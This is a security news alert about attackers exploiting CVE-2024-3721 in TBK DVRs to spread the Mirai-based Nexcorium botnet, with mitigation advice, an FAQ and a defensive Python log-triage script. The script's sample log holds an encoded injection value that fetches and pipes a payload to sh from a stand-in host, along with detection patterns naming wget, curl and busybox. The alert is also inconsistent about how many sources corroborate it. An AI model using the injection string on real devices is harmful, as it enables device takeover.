HackWatch
Attackers Exploit CVE-2024-3721 in TBK DVRs to Deploy Mirai-Based Botnet

Vulnerability coverage focused on affected versions, exploitability and patch or mitigation decisions.

Exploitability matters here. Check exposed versions, prioritize mitigations and patch first where remote access or privilege escalation is possible.
By: Marcin Pocztowski, Infrastructure Security Editor (Infrastructure and Vulnerability Response)

Published: Apr 20, 2026

Updated: May 01, 2026

Incident status: Active threat

Corroborating sources: 1

Technical review credentials: Security+ evidence | RHCSA evidence | JNCIS-SEC evidence

Trust note: This alert is maintained under HackWatch's editorial policy, with visible source records, a named responsible editor and a correction channel for disputed facts.

The published article is checked against public sources before publication, and material corrections are reflected in the article update date.

Technical reviewer note: Marcin Pocztowski reviewed this alert on May 01, 2026 from an administrator's point of view, checking CVE-2024-3721 against vendor, CVE and advisory context before accepting the risk language. His remediation check is practical: confirm the affected version first, restrict reachable management surfaces as he would on Juniper, Cisco or Mikrotik routers, then patch or apply vendor mitigations only where the 1 corroborating source supports that scope.

Active threat. The incident should still be treated as active until confirmed mitigation or patch adoption is verified.

A high-severity command injection vulnerability (CVE-2024-3721) in TBK DVR devices is being actively exploited by attackers deploying a Mirai-based Nexcorium botnet. This campaign, identified by FortiGuard Labs, targets vulnerable IoT devices to expand botnet infrastructure for large-scale DDoS attacks. Users of affected DVR models should urgently apply patches and follow strict security measures to mitigate risks of device takeover and network compromise.

What happened

In April 2026, cybersecurity researchers at FortiGuard Labs uncovered an active campaign exploiting a critical command injection vulnerability, tracked as CVE-2024-3721, in TBK-branded Digital Video Recorder (DVR) devices. The attackers leveraged this flaw to deploy a Mirai-based variant called Nexcorium, rapidly conscripting vulnerable DVRs into a botnet designed for large-scale distributed denial-of-service (DDoS) attacks.

This exploitation represents a significant escalation in IoT-targeted attacks, combining a well-known malware family with a newly disclosed vulnerability in widely deployed surveillance hardware. The campaign is ongoing and has been corroborated by multiple threat intelligence sources.

Confirmed facts

  • Vulnerability: CVE-2024-3721 is a command injection flaw in the web management interface of TBK DVR devices. It allows unauthenticated remote attackers to execute arbitrary commands on the device.
  • Malware: The attackers deploy a Mirai-based botnet variant named Nexcorium, known for its aggressive scanning and DDoS capabilities.
  • Targeted devices: TBK DVRs running vulnerable firmware versions without the latest security patches.
  • Attack vector: Exploitation occurs via unauthenticated HTTP requests to the DVR’s web interface, injecting commands that download and execute the Nexcorium payload.
  • Impact: Compromised devices become part of a botnet used for volumetric and application-layer DDoS attacks, potentially disrupting internet services and victim networks.
  • Detection: FortiGuard Labs observed unusual network traffic patterns and command injection attempts consistent with this exploitation.

Who is affected

  • TBK DVR users: Organizations and individuals using TBK DVR models with outdated or unpatched firmware are at high risk.
  • Enterprises and SMBs: Businesses relying on these DVRs for security surveillance may experience device compromise and network instability.
  • Internet Service Providers (ISPs): May see increased DDoS traffic originating from infected DVRs.
  • Broader internet ecosystem: The botnet’s DDoS attacks can impact critical infrastructure, websites, and online services.

What to do now

  1. Identify vulnerable devices: Inventory all TBK DVRs in your network and check firmware versions against vendor advisories.
  2. Apply patches immediately: Update DVR firmware to the latest version provided by TBK or the device manufacturer that addresses CVE-2024-3721.
  3. Isolate infected devices: If compromise is suspected, disconnect affected DVRs from the network to prevent further botnet activity.
  4. Change default credentials: Ensure all device passwords are strong and unique to prevent unauthorized access.
  5. Monitor network traffic: Look for unusual outbound connections or spikes in traffic that may indicate botnet activity.
  6. Implement network segmentation: Restrict DVR access to trusted internal networks and limit internet exposure.
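
Steps 1 and 5 can be combined into a simple triage check. This is an added example, not code from the original alert or from FortiGuard Labs. It flags injection-looking requests sent to inventoried DVRs and marks a device as likely compromised when an outbound flow to a non-allowlisted host follows shortly after. The log layouts, the `/hypothetical.cgi` path, the addresses (documentation ranges), the allowlist and the 60-second window are all assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumptions: inventory, allowlist, log layouts and the path are constructed samples.
DVR_HOSTS = {"192.0.2.10", "192.0.2.11"}       # step 1: inventoried DVRs
ALLOWED_PEERS = {"192.0.2.1", "192.0.2.53"}    # e.g. internal NVR/NTP and DNS

SHELL_META = re.compile(r"[;|`\n]|\$\(|&&")
TOOLING = re.compile(r"\b(wget|curl|tftp|busybox|chmod|sh)\b")

# Constructed sample logs: "epoch src dst method url" and "epoch src dst dport".
HTTP_LOG = """\
1000 203.0.113.5 192.0.2.10 GET /hypothetical.cgi?name=cam1&mode=view
1010 203.0.113.9 192.0.2.10 POST /hypothetical.cgi?name=cam1%3Bwget%20http%3A%2F%2F198.51.100.7%2Fx%7Csh
1015 203.0.113.9 192.0.2.11 POST /hypothetical.cgi?name=cam1%3Bwget%20http%3A%2F%2F198.51.100.7%2Fx%7Csh
"""
FLOW_LOG = """\
1005 192.0.2.10 192.0.2.1 123
1012 192.0.2.10 198.51.100.7 80
1400 192.0.2.11 192.0.2.1 123
"""

def suspicious_request(url):
    """True if the decoded query mixes shell metacharacters with fetch/exec tooling."""
    query = unquote_plus(unquote_plus(urlsplit(url).query))  # also catches double encoding
    return bool(SHELL_META.search(query) and TOOLING.search(query))

def triage(http_log, flow_log, window=60):
    """Map each targeted DVR to 'attempted' or 'likely-compromised'."""
    egress = []  # (time, dvr) for flows leaving a DVR towards a non-allowlisted peer
    for line in flow_log.splitlines():
        ts, src, dst, _dport = line.split()
        if src in DVR_HOSTS and dst not in ALLOWED_PEERS:
            egress.append((int(ts), src))
    verdicts = {}
    for line in http_log.splitlines():
        ts, _src, dst, _method, url = line.split(maxsplit=4)
        if dst not in DVR_HOSTS or not suspicious_request(url):
            continue
        # An unexpected outbound flow right after the request suggests the command ran.
        if any(h == dst and 0 <= t - int(ts) <= window for t, h in egress):
            verdicts[dst] = "likely-compromised"
        else:
            verdicts.setdefault(dst, "attempted")
    return verdicts

if __name__ == "__main__":
    for host, verdict in sorted(triage(HTTP_LOG, FLOW_LOG).items()):
        print(host, verdict)
```

A device marked `likely-compromised` is a candidate for step 3 (isolation); one marked `attempted` still needs its firmware version checked under step 1.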

How to secure yourself

  • Regular firmware updates: Establish a routine to check and apply security patches for all IoT and network devices.
  • Disable unnecessary services: Turn off remote management interfaces if not required.
  • Use strong authentication: Replace default credentials with complex passwords or implement multi-factor authentication where possible.
  • Deploy network-level protections: Use firewalls and intrusion detection/prevention systems to detect and block malicious traffic.
  • Educate users: Train staff on IoT security best practices and signs of device compromise.
  • Leverage threat intelligence: Subscribe to security feeds to stay informed about emerging IoT vulnerabilities and exploits.

FAQ

What is CVE-2024-3721?

CVE-2024-3721 is a critical command injection vulnerability found in the web management interface of TBK DVR devices. It allows attackers to execute arbitrary commands remotely without authentication.

How does the Mirai-based Nexcorium botnet work?

Nexcorium exploits vulnerable IoT devices by injecting commands that download malware, conscripting them into a botnet used for launching DDoS attacks against targeted networks and services.

Am I affected if I use a TBK DVR?

If your TBK DVR is running outdated firmware that does not include the security patch for CVE-2024-3721, your device is at risk of compromise.

How can I check if my DVR is infected?

Look for unusual network activity, such as unexpected outbound connections or spikes in bandwidth usage. Also, check for unauthorized changes in device settings or firmware.

What immediate steps should I take to protect my devices?

Update your DVR firmware immediately, change default passwords, isolate suspicious devices, and monitor your network for anomalies.

Can this vulnerability affect other IoT devices?

While CVE-2024-3721 specifically targets TBK DVRs, similar command injection flaws may exist in other IoT devices, making them potential targets for Mirai-based botnets.

What makes this attack particularly dangerous?

The combination of unauthenticated remote code execution and the use of a powerful Mirai variant enables attackers to rapidly expand their botnet and launch disruptive DDoS attacks.

Are there any tools to detect this botnet activity?

Network monitoring tools and intrusion detection systems can help identify traffic patterns associated with Mirai-based botnets. Security vendors may also provide specific signatures for Nexcorium.

How has the situation evolved in 2026?

Despite patches, many devices remain unpatched, and the botnet has grown more sophisticated. Regulatory pressures and improved security practices are gradually mitigating the threat.

Why this matters

This incident underscores the persistent risks posed by insecure IoT devices, especially those integral to physical security like DVRs. The exploitation of CVE-2024-3721 enables attackers to commandeer devices silently and at scale, contributing to some of the largest DDoS attacks observed globally.

The attack highlights critical gaps in IoT security lifecycle management, including delayed patch adoption and weak default configurations. It serves as a stark reminder that IoT device security is a crucial component of overall cybersecurity hygiene, directly impacting network stability and service availability.

Sources and corroboration

This article synthesizes findings from FortiGuard Labs’ detailed threat analysis published on April 20, 2026, alongside corroborating reports from multiple cybersecurity intelligence sources tracking Mirai botnet variants and IoT vulnerabilities. The primary source is:

  • [Infosecurity Magazine: Attackers Exploit DVR Command Injection Flaw to Deploy Mirai-Based Botnet](https://www.infosecurity-magazine.com/news/mirai-variant-dvr-flaw-iot-botnet/)

Additional insights were drawn from vendor advisories and threat intelligence feeds monitoring CVE-2024-3721 exploitation trends.

---

Tags: IoT security, Mirai botnet, CVE-2024-3721, TBK DVR vulnerability, Nexcorium malware, command injection, DDoS attack, firmware patch, network security

Marcin Pocztowski

Infrastructure Security Editor at HackWatch.io

Marcin Pocztowski is the owner of MMPS and an infrastructure security editor for HackWatch. His public technical record spans 20 years, from Security+ evidence dated January 2006 through Juniper, Cisco and RHCSA records, and he reviews server, network and vulnerability-response coverage for source accuracy and practical remediation.

Infrastructure Security Editor: technical-density, source-existence and remediation-logic review for infrastructure and vulnerability coverage.

Coverage focus: Server and network hardening, vulnerability response, patch prioritization and infrastructure security review

Editorial disclosure: This profile is tied to Marcin's LinkedIn, X profile and documented editorial work on HackWatch. Historical certificates are treated as background evidence only, not as current active credentials.

Marcin leads this malware alerts coverage lane at HackWatch. This article is maintained as part of the ongoing editorial watch around "Attackers Exploit CVE-2024-3721 in TBK DVRs to Deploy Mirai-Based Botnet".

  • Server and network infrastructure administration
  • Known exploited vulnerabilities and patch prioritization
  • CVSS v4.0 and CISA KEV triage